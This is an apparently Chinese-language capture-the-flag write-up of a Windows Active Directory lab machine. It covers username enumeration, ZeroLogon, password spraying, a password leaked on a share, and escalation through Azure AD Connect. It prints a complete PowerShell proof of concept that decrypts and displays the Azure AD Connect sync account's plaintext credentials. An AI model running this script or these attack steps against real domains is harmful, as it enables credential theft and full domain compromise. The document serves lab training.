信息收集
端口信息
data:image/s3,"s3://crabby-images/c0769/c076981f67f93aaa5018acd1b42e5c998b9c1b0c" alt=""
这回连Web站点都没有,入口应该是Windows服务了
用户名泄露
通过RPC服务发现了10个用户名
1 2 3 4 5 6 7 8 9 10 11
| AAD_987d7f2f57d2 mhope SABatchJobs svc-ata svc-bexec svc-netapp dgalanos roleary smorgan Guest
|
data:image/s3,"s3://crabby-images/bce03/bce0348648140a5070fc06f9c9007cc059c34e78" alt=""
ZeroLogon
竟然有ZeroLogon
data:image/s3,"s3://crabby-images/32be8/32be807aad6563e96f9ec56f0f0c77d78a31102b" alt=""
游戏结束…
data:image/s3,"s3://crabby-images/71231/7123110332c105eceb3ab13d7631c4b834f5cf2c" alt=""
利用空密码Dump Hash
data:image/s3,"s3://crabby-images/c8354/c8354deb471717e2d7446985b66c3d90ff94a51d" alt=""
PTH
data:image/s3,"s3://crabby-images/784e9/784e9b07f7b8ff7ca78728d130a5f9e391c17e81" alt=""
认真打靶
这样的话也太没意义了,正常路径不应该是这样的。
墙裂推荐域渗透思维导图:
https://orange-cyberdefense.github.io/ocd-mindmaps/img/pentest_ad_dark_2022_11.svg
ASREP Roast
上面获取到了用户名,可以试一下ASREPRoast可惜没有
data:image/s3,"s3://crabby-images/32c1f/32c1f63fe546f69806835c5e67b5e032b5135ea9" alt=""
密码喷洒
从密码策略来看,最小7位;AD域也有锁定账户的策略。我们只能尝试密码喷洒
data:image/s3,"s3://crabby-images/5427c/5427c8a85fb5704620ea77c32c7a5ef8189c997b" alt=""
先试一下用户名密码相同的情况,获得一个用户密码
data:image/s3,"s3://crabby-images/1b172/1b172418522cf6ffb0f6b1a586536fee73634310" alt=""
5985端口虽然开了但是winrm登陆失败
data:image/s3,"s3://crabby-images/8e391/8e39171318794e76dea16aef0a7f5ff1a9779e0b" alt=""
共享泄漏密码
尝试看看共享,可读的目录很多
data:image/s3,"s3://crabby-images/94eb2/94eb24608e0dcfe024b5492a4ff1a0384671d278" alt=""
发现Azure密码
data:image/s3,"s3://crabby-images/0c561/0c561844a08feef6f23366e831ce6b485640e471" alt=""
尝试winrm登录,获取user flag
data:image/s3,"s3://crabby-images/88205/88205ae4d6a8fb3a78e1b56e7bfe7f8dafec41d2" alt=""
提权
上BloodHound扫了一遍,没有发现什么可用的提权路径
data:image/s3,"s3://crabby-images/65e63/65e63040ba52931feb35ef98e819f11905790ae6" alt=""
winPEAS发现了Azure Token,了解了一下Token已经是过期的了
data:image/s3,"s3://crabby-images/70df3/70df3eb8c9b8f4efaf65b1784bb27ff8b9e37cd6" alt=""
后面留意到mhope在Azure Admins组中;
Azure Admins是 Azure AD 中的一个预定义组,该组成员可以执行任何 Azure AD 操作
data:image/s3,"s3://crabby-images/f8a37/f8a37c9b6f0fe816e8423f23af982460dfc68cc0" alt=""
于是开始寻找如何通过AzureAD提权,大部分都是需要在Azure云上操作的,用不上。
AzureAD提权
最终在这个Github项目中发现了通过Azure AD连接同步账户同步整个域hash的提权方式,正好适合我们这种情况。
data:image/s3,"s3://crabby-images/4c986/4c986fa25eb7b1c420f8087bc6883ece8f3718db" alt=""
XPN大佬写好了获取密码并利用mcrypt.dll解密获取明文密码的PowerShell
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38
| Write-Host "AD Connect Sync Credential Extract POC (@_xpn_)`n"
$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Data Source=(localdb)\.\ADSync;Initial Catalog=ADSync" $client.Open() $cmd = $client.CreateCommand() $cmd.CommandText = "SELECT keyset_id, instance_id, entropy FROM mms_server_configuration" $reader = $cmd.ExecuteReader() $reader.Read() | Out-Null $key_id = $reader.GetInt32(0) $instance_id = $reader.GetGuid(1) $entropy = $reader.GetGuid(2) $reader.Close()
$cmd = $client.CreateCommand() $cmd.CommandText = "SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent WHERE ma_type = 'AD'" $reader = $cmd.ExecuteReader() $reader.Read() | Out-Null $config = $reader.GetString(0) $crypted = $reader.GetString(1) $reader.Close()
add-type -path 'C:\Program Files\Microsoft Azure AD Sync\Bin\mcrypt.dll' $km = New-Object -TypeName Microsoft.DirectoryServices.MetadirectoryServices.Cryptography.KeyManager $km.LoadKeySet($entropy, $instance_id, $key_id) $key = $null $km.GetActiveCredentialKey([ref]$key) $key2 = $null $km.GetKey(1, [ref]$key2) $decrypted = $null $key2.DecryptBase64ToString($crypted, [ref]$decrypted)
$domain = select-xml -Content $config -XPath "//parameter[@name='forest-login-domain']" | select @{Name = 'Domain'; Expression = {$_.node.InnerXML}} $username = select-xml -Content $config -XPath "//parameter[@name='forest-login-user']" | select @{Name = 'Username'; Expression = {$_.node.InnerXML}} $password = select-xml -Content $decrypted -XPath "//attribute" | select @{Name = 'Password'; Expression = {$_.node.InnerText}}
Write-Host ("Domain: " + $domain.Domain) Write-Host ("Username: " + $username.Username) Write-Host ("Password: " + $password.Password)
|
这里需要将第一行的连接信息改一下,否则直接报错退出winrm
1 2
| $client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Server=127.0.0.1;Database=ADSync;Integrated Security=True
|
data:image/s3,"s3://crabby-images/b5497/b54971f5a5147d8f8db49b13b0feced61922a2d0" alt=""
获得root flag